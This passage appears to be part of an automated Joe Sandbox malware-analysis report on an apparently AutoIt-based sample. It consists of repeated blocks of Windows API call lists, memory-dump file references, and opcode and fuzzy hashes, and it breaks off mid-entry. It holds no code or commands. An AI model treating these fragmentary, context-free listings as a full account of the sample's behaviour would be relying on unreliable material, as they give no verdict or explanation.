                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2294984445-0
                                                                                                                                                                                                                                      • Opcode ID: b9afa95c1e41c5d811bf735bc0a482ffa7fbe5ad97afdc788345af08ed328996
                                                                                                                                                                                                                                      • Instruction ID: 3e0abf2a4aa41fd4f10c5fa604ab9caec5adb85b4f331ef0c761b747d05441f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9afa95c1e41c5d811bf735bc0a482ffa7fbe5ad97afdc788345af08ed328996
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A21B271214209DFCB149F39DD08A7E3BA5EB85328F15962AFA26E61E0EF309950DB10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC163E: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC1654
                                                                                                                                                                                                                                        • Part of subcall function 00EC163E: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC1660
                                                                                                                                                                                                                                        • Part of subcall function 00EC163E: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC166F
                                                                                                                                                                                                                                        • Part of subcall function 00EC163E: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC1676
                                                                                                                                                                                                                                        • Part of subcall function 00EC163E: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC168C
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00EC19BF), ref: 00EC1E38
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EC1E44
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00EC1E4B
                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00EC1E64
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00EC19BF), ref: 00EC1E78
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC1E7F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3008561057-0
                                                                                                                                                                                                                                      • Opcode ID: d0714dc95109681ba3f1259a22d957a9370c1a3a461ee319b207a82e918c7f7c
                                                                                                                                                                                                                                      • Instruction ID: bae46f092740d04b77f1dc477d6156d867f415d02908468783281064a016076f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0714dc95109681ba3f1259a22d957a9370c1a3a461ee319b207a82e918c7f7c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D11AC71601205FFEB109BA5CD09FAF7BAAEB82359F50405CE841F7221C732A946CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EC1B89
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00EC1B90
                                                                                                                                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EC1B9F
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00EC1BAA
                                                                                                                                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EC1BD9
                                                                                                                                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EC1BED
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1413079979-0
                                                                                                                                                                                                                                      • Opcode ID: c94e15b4d8ce7361a07af1a24d2a72f67b5950ac035896f087b3d74ba3e8d978
                                                                                                                                                                                                                                      • Instruction ID: 2134744f812da3f6df38d60fd63ffd9798615e1421d62118fe11b948f4e8e249
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c94e15b4d8ce7361a07af1a24d2a72f67b5950ac035896f087b3d74ba3e8d978
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA112C72505249EFDF018F94DE49FEE7BAAEF45348F044059FA04B2061D3768D65DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E7983F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E79899
                                                                                                                                                                                                                                        • Part of subcall function 00E7983F: SelectObject.GDI32(?,00000000), ref: 00E798A8
                                                                                                                                                                                                                                        • Part of subcall function 00E7983F: BeginPath.GDI32(?), ref: 00E798BF
                                                                                                                                                                                                                                        • Part of subcall function 00E7983F: SelectObject.GDI32(?,00000000), ref: 00E798E8
                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00EF926F
                                                                                                                                                                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00EF9283
                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00EF9291
                                                                                                                                                                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00EF92A1
                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 00EF92B1
                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 00EF92C1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                                                                                      • Opcode ID: 8c586f894e4e5d486add5f2000571ab030bfd8e032f2398e4f6eb5f79437c768
                                                                                                                                                                                                                                      • Instruction ID: d56c3ac23dd90dac3dbc584e764acb6ea74d46ac4b40b8bbca88fbeacb265260
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c586f894e4e5d486add5f2000571ab030bfd8e032f2398e4f6eb5f79437c768
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A911DB7200410DBFEF129F91DC88FAA7FAEEF09364F048051BE596A161C771AD55DBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EC58B6
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EC58C7
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EC58CE
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00EC58D6
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00EC58ED
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00EC58FF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1035833867-0
                                                                                                                                                                                                                                      • Opcode ID: 983bde52db47a05332ed9f5b7d5f94c02e55b58522b4ad7728da0f4095e397c9
                                                                                                                                                                                                                                      • Instruction ID: ce6f813fdc1fe4a65ede3f3304ca7176ccbc2241f638d0dbbb3eeb71e5012eea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 983bde52db47a05332ed9f5b7d5f94c02e55b58522b4ad7728da0f4095e397c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 750184B5A00308BFEB109FA69D49F5E7FB9EB88351F004065FA04FB280D6709815CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E621C9
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E621D1
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E621DC
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E621E7
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E621EF
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E621F7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                                                                                      • Opcode ID: bfbd286327145766da2f912b62ad00ac8a64d32df69a3501772e47c383a1f638
                                                                                                                                                                                                                                      • Instruction ID: 8d31b8bb7aaff9221fe49a3996bd269691078fc684edbb64a28bd535a2f945bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfbd286327145766da2f912b62ad00ac8a64d32df69a3501772e47c383a1f638
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36016CB09017597DE3008F5A8C85B52FFA8FF59354F00411B915C47941C7F5A864CBE5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00ECF252
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00ECF268
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00ECF277
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ECF286
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ECF290
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ECF297
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                                                                                      • Opcode ID: d2a4d4decc2714a4894dce7eb301ba80a6aa778e5468e5961dcf5aa4d27a846a
                                                                                                                                                                                                                                      • Instruction ID: ff65d32671e1fbbcc8964a8855d344c97fabd93706e77a7d8d4aaccc69f5aa9f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2a4d4decc2714a4894dce7eb301ba80a6aa778e5468e5961dcf5aa4d27a846a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2F01772245158BFE7215B639C0EEEF7F7DEBC6B15F000059F605E2090A6A06A05D6B6
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00EB7A4E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00EB7A65
                                                                                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 00EB7A71
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00EB7A80
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00EB7A92
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 00EB7AAC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 272304278-0
                                                                                                                                                                                                                                      • Opcode ID: f8a3b41e29ce8f7fd957cd504ce393d09b52bf8b2b12b70ebbda1b1e6f9ffb61
                                                                                                                                                                                                                                      • Instruction ID: d7933d70124153b0ea45e2d427b27fedb4bc728ed2bce8f472f2b992f195f897
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8a3b41e29ce8f7fd957cd504ce393d09b52bf8b2b12b70ebbda1b1e6f9ffb61
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14014831508109EFDB91AB60DC08BFE7FB6FB84311F110160F956B61A1CB311E85EB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EC1F09
                                                                                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00EC1F15
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EC1F1E
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EC1F26
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC1F2F
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC1F36
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                                                                                      • Opcode ID: 8834cbca5ca9548c437016fce4a8520822801280b0afb417e2d8cb9108cfd8bf
                                                                                                                                                                                                                                      • Instruction ID: a87249b2d2642900552743f801100fe046f0baa2221ec28499d60d730a97f2e0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8834cbca5ca9548c437016fce4a8520822801280b0afb417e2d8cb9108cfd8bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E0E576009105BFDB012FA2EC0CD2ABF3AFF89322B504221F225E20B0CB329424EB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EE41C4
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00EE42D3
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EE4478
                                                                                                                                                                                                                                        • Part of subcall function 00ED14A9: VariantInit.OLEAUT32(00000000), ref: 00ED14E9
                                                                                                                                                                                                                                        • Part of subcall function 00ED14A9: VariantCopy.OLEAUT32(?,?), ref: 00ED14F2
                                                                                                                                                                                                                                        • Part of subcall function 00ED14A9: VariantClear.OLEAUT32(?), ref: 00ED14FE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                                                                                                                                      • Opcode ID: 12c86a444e58b8b8250ea44374bf9477478d7c21cfb3ec1ac5db200febf1a3cc
                                                                                                                                                                                                                                      • Instruction ID: 47e47ac49e94627024b8a35d46a91a660abb106045a6bdba0da2a694a103fa4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12c86a444e58b8b8250ea44374bf9477478d7c21cfb3ec1ac5db200febf1a3cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A491ABB56083459FC700EF65D48096AB7E5FF88318F14992DF899A7391DB31ED0ACB82
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC063D: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EC0570,80070057,?,?,?,00EC098D), ref: 00EC065A
                                                                                                                                                                                                                                        • Part of subcall function 00EC063D: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EC0570,80070057,?,?), ref: 00EC0675
                                                                                                                                                                                                                                        • Part of subcall function 00EC063D: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EC0570,80070057,?,?), ref: 00EC0683
                                                                                                                                                                                                                                        • Part of subcall function 00EC063D: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EC0570,80070057,?), ref: 00EC0693
                                                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00EE54AA
                                                                                                                                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00EE5628
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00EE5633
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                      • API String ID: 4175897753-2785691316
                                                                                                                                                                                                                                      • Opcode ID: 98cef565741680e5502967db5e794e4749871cab1742a7fe737f62063f42a9f2
                                                                                                                                                                                                                                      • Instruction ID: bc650b9df3851fef12a5f4612bacf3c79270163659194d98f5d308f60ea2d533
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98cef565741680e5502967db5e794e4749871cab1742a7fe737f62063f42a9f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44912772D0025D9FDF14DFA5DC80AEEB7B9AF08308F10516AE915B7251EB709A48CFA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?,00000000,?), ref: 00EE954C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
